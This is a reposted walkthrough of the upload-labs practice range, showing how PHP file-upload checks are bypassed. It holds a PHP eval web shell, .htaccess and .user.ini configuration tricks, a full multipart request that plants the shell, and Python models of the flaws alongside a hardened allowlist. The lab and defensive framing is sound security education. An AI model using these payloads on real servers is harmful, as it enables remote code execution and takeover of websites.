upload-labs walkthrough

admin 2026-03-13 01:45:55 Cybersecurity articles Source: ZONE.CI Global Network

Article summary: This document is a walkthrough of the upload-labs practice range. It describes bypass methods for the different file-upload validation mechanisms, including front-end JS validation bypass, MIME type modification, exploitation of incomplete blacklist filtering (such as .phtml, .htaccess and .user.ini), case bypass, space bypass and dot bypass. Through source-code analysis and payload demonstrations it explains how file-upload vulnerabilities are exploited in practice and gives concrete, reproducible steps for web security testing. Overall score: 85 Categories: penetration testing, web security, vulnerability analysis, security construction, hands-on experience


payload

<?php
@eval($_POST['a']);
?>

Disable JavaScript in the settings of the F12 developer tools.

First upload an .htaccess file to change the configuration temporarily (note: the whole file name is .htaccess; it is not a suffix).

AddType application/x-httpd-php .png

Pass-06 【missing trim()】 space bypass

Source code

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name);//remove trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//remove the string ::$DATA

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file,$img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

The trim() function is missing; it is what strips leading and trailing whitespace.

Capture the request and change the suffix to .php followed by a single trailing space.

Space bypass

Pass-07 【missing deldot()】 dot bypass

Source code

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//remove the string ::$DATA
        $file_ext = trim($file_ext); //strip leading/trailing whitespace

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

The deldot() function is gone; it is what removes trailing dots from the file name.

Dot bypass

Capture the request and change the suffix to .php. (with a trailing dot).

Pass-08 【missing ::$DATA stripping, Windows environment】 ::$DATA bypass

Source code

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//remove trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //convert to lowercase
        $file_ext = trim($file_ext); //strip leading/trailing whitespace

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

This line is missing:

$file_ext = str_ireplace('::$DATA', '', $file_ext);//remove the string ::$DATA

When you upload a file named shell.php::$DATA:

  1. Back-end code (validation layer): it sees a suffix ending in ::$DATA. It compares that against the blacklist (.php, .asp, .jsp) and finds it is not on the list, so the upload is allowed.
  2. Windows save (storage layer): when Windows goes to store the file it sees the ::$DATA suffix, strips it automatically, and writes only the preceding shell.php to disk as the file name.

Result: the check is fooled, but a complete, executable .php file is left on disk.

Capture the request and change the suffix to .php::$DATA

Then request the randomly renamed file, without the ::$DATA part.

Pass-09 【missing random naming】 bind .user.ini again + ". ." dot-space-dot bypass

Source code

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//remove trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //convert to lowercase
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//remove the string ::$DATA
        $file_ext = trim($file_ext); //strip leading/trailing whitespace

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

The random naming is missing:

$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;

This level has instead:

$img_path = UPLOAD_PATH.'/'.$file_name;

So the .user.ini trick, unused until now, becomes available.

First upload a .user.ini to change the configuration:

auto_prepend_file=9.png
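Pass-06 through Pass-09 each drop one step of the same normalization pipeline, and Pass-09 shows that even with every step present the stored name is still the client's name. The Python below is an added example for this walkthrough, not code from upload-labs or from the post: blacklist_ext() re-implements the lab's pipeline with each guard switchable, so you can see exactly which malformed name gets through when that guard is absent, and hardened_store_name() is the allowlist-plus-server-side-rename check that closes all four holes at once. DENY_EXT is a constructed, shortened copy of the lab's $deny_ext list; the function names, ALLOWED_EXT and SAFE_BASE are assumptions of this example.

```python
"""Model of the upload-labs blacklist pipeline (Pass-06 .. Pass-09) next to a
hardened allowlist.  Added example for this walkthrough; not code from the lab."""
import re
import secrets

# Constructed, shortened copy of the lab's $deny_ext list.
DENY_EXT = {".php", ".php5", ".php3", ".phtml", ".pht", ".htaccess",
            ".jsp", ".asp", ".aspx", ".html", ".htm"}


def blacklist_ext(name, trim=True, deldot=True, strip_ads=True):
    """Re-implements the lab's normalization steps in Python.

    Each keyword switches one guard off, mirroring the level that omits it:
      trim=False      -> Pass-06 (trailing space survives)
      deldot=False    -> Pass-07 (trailing dot survives)
      strip_ads=False -> Pass-08 (::$DATA survives)
    Returns (extension as the check saw it, True if the blacklist let it through).
    """
    if trim:
        name = name.strip()                     # trim($_FILES[...]['name'])
    if deldot:
        name = name.rstrip(".")                 # deldot(): drop trailing dots
    idx = name.rfind(".")
    ext = name[idx:] if idx != -1 else ""       # strrchr($file_name, '.')
    ext = ext.lower()                           # strtolower()
    if strip_ads:
        ext = re.sub(r"::\$data", "", ext, flags=re.IGNORECASE)  # str_ireplace('::$DATA', '', ...)
    if trim:
        ext = ext.strip()                       # trim($file_ext)
    return ext, ext not in DENY_EXT


# Hardened replacement (assumption: the app only ever needs these three image types).
ALLOWED_EXT = {"jpg", "png", "gif"}
SAFE_BASE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def hardened_store_name(client_name):
    """Allowlist the extension of the exact name received, then throw the client
    name away and pick a server-generated one (the random naming Pass-09 lacks).
    Returns the name to store, or None to reject."""
    base, dot, ext = client_name.rpartition(".")
    if not dot or not SAFE_BASE.fullmatch(base):
        return None      # no extension, or base contains a space, dot, slash, colon, ...
    ext = ext.lower()
    if ext not in ALLOWED_EXT:
        return None      # "php ", "php.", "php::$DATA" and "ini" all land here untouched
    return f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    # Constructed probe names, one per level discussed above.
    probes = [
        ("shell.php ",        dict(trim=False)),       # Pass-06
        ("shell.php.",        dict(deldot=False)),     # Pass-07
        ("shell.php::$DATA",  dict(strip_ads=False)),  # Pass-08
        ("shell.php. .",      {}),                     # Pass-09: every guard on, still passes
        (".user.ini",         {}),
        ("cat.JPG",           {}),
    ]
    for name, flags in probes:
        ext, passed = blacklist_ext(name, **flags)
        print(f"{name!r:22} blacklist saw {ext!r:14} passed={passed!s:5} "
              f"allowlist -> {hardened_store_name(name)}")
```

The point of the model is that every blacklist variant is one missing normalization away from failure, whereas the allowlist never normalizes at all: anything that is not a clean base plus a known extension is rejected as received, and the name written to disk never contains client input.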

After a lot of fiddling I found my environment was not set up properly.

This level is a whitelist: only the jpg, png and gif suffixes are allowed.

The hint says the upload path is controllable.

Capture a request and take a look (actually, I looked at the writeup).

Captured request

During the upload I found that a \ was missing.

Pass-19【move_uploaded_file()】 php plus /. bypass

Source code

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

        $file_name = $_POST['save_name'];
        $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);

        if(!in_array($file_ext,$deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            }else{
                $msg = '上传出错!';
            }
        }else{
            $msg = '禁止保存为该类型文件!';
        }

    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

if (move_uploaded_file($temp_file, $img_path)) {

move_uploaded_file() has a quirk: it ignores a trailing /. at the end of the target path.

Upload

Change the filename suffix to png.

Change save_name to 19.php/.

Pass-20【$ext = end($file)】 array bypass

Source code

$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
    //check the MIME type
    $allow_type = array('image/jpeg','image/png','image/gif');
    if(!in_array($_FILES['upload_file']['type'],$allow_type)){
        $msg = "禁止上传该类型文件!";
    }else{
        //check the file name
        $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
        if (!is_array($file)) {
            $file = explode('.', strtolower($file));
        }

        $ext = end($file);
        $allow_suffix = array('jpg','png','gif');
        if (!in_array($ext, $allow_suffix)) {
            $msg = "禁止上传该后缀文件!";
        }else{
            $file_name = reset($file) . '.' . $file[count($file) - 1];
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $msg = "文件上传成功!";
                $is_upload = true;
            } else {
                $msg = "文件上传失败!";
            }
        }
    }
}else{
    $msg = "请选择要上传的文件!";
}

$allow_type = array('image/jpeg','image/png','image/gif');

For the MIME check, just change Content-Type to image/jpeg.

$file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
        if (!is_array($file)) {
            $file = explode('.', strtolower($file));
        }

        $ext = end($file);

save_name can be sent as an array; the ext that gets checked is then the last element of that array.

Bypassing validation with an array

The request is as follows:

POST /Pass-20/index.php HTTP/1.1
Host: localhost
Content-Length: 522
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="143", "Not A(Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydlBqvSPRkgc1WXqh
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/Pass-20/index.php
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundarydlBqvSPRkgc1WXqh
Content-Disposition: form-data; name="upload_file"; filename="20.jpg"
Content-Type: image/jpeg

<?php @eval($_POST["a"]); ?>
------WebKitFormBoundarydlBqvSPRkgc1WXqh
Content-Disposition: form-data; name="save_name[0]"

20.php/
------WebKitFormBoundarydlBqvSPRkgc1WXqh
Content-Disposition: form-data; name="save_name[2]"

jpg
------WebKitFormBoundarydlBqvSPRkgc1WXqh
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundarydlBqvSPRkgc1WXqh--
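Pass-19 and Pass-20 share one root cause: the string that is checked is not the string that is stored. The Python below is an added model for this walkthrough, not the lab's PHP: pass20_flawed() mirrors the explode/end/reset logic shown above, taking either a plain string or a dict that stands in for a PHP array with explicit keys (the save_name[0] and save_name[2] fields of the request), and pass20_fixed() shows the repair, which is to refuse array input and validate the exact name that will be written, so Pass-19's trailing /. is rejected by the same check. The function names and the SAFE_NAME pattern are assumptions of this example.

```python
"""Model of the Pass-20 save_name logic and a fix that also covers Pass-19.
Added example for this walkthrough; not code from upload-labs."""
import re

ALLOW_SUFFIX = {"jpg", "png", "gif"}          # the lab's $allow_suffix


def pass20_flawed(save_name):
    """Mirror of the lab's checks.

    save_name is a str for a normal form field, or a dict with integer keys
    standing in for a PHP array, e.g. {0: "20.php/", 2: "jpg"} for the request
    fields save_name[0]=20.php/ and save_name[2]=jpg.
    Returns (extension that was checked, stored file name or None if rejected).
    """
    if isinstance(save_name, str):
        # explode('.', strtolower($file)) -> sequential keys 0..n-1
        file = dict(enumerate(save_name.lower().split(".")))
    else:
        # is_array($file) is true: no explode, no lowercasing, keys kept as sent
        file = dict(save_name)
    values = list(file.values())
    ext = values[-1]                                   # end($file): last element
    if ext not in ALLOW_SUFFIX:
        return ext, None
    # reset($file) . '.' . $file[count($file) - 1]
    # With keys {0, 2}, count() is 2, so $file[1] is undefined and yields "" (PHP null).
    stored = f"{values[0]}.{file.get(len(file) - 1, '')}"
    return ext, stored


# Assumption: what a stored name is allowed to look like (lowercase base + image suffix).
SAFE_NAME = re.compile(r"[a-z0-9_-]{1,64}\.(jpg|png|gif)")


def pass20_fixed(save_name):
    """Repair: accept only a string, and validate the exact name that will be stored."""
    if not isinstance(save_name, str):
        return None                                   # an array is type confusion, not a name
    stored = save_name.lower()
    return stored if SAFE_NAME.fullmatch(stored) else None


if __name__ == "__main__":
    # Constructed inputs: the normal case, the request from the walkthrough, and Pass-19's name.
    for probe in ["20.jpg", "20.php", {0: "20.php/", 2: "jpg"}, "19.php/."]:
        print(f"{probe!r:32} flawed -> {pass20_flawed(probe) if not isinstance(probe, dict) or True else None}"
              f"   fixed -> {pass20_fixed(probe)}")
```

In the flawed path the value checked ("jpg") and the value stored ("20.php/.") are two different elements of the same array, which is exactly why the check is meaningless; the fix checks nothing but the final string.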

Reference links

[1] upload-labs walkthrough (complete) – 清茶先生 – 博客园: https://www.cnblogs.com/chu-jian/p/15515770.html
[2] huntergregal/PNG-IDAT-Payload-Generator: Generate a PNG with a payload embedded in the IDAT chunk (Based off of previous concepts and code — credit in README): https://github.com/huntergregal/PNG-IDAT-Payload-Generator



This article is reposted from: 取证额头 渗透额头 渗透额头 "upload-labs通关攻略"
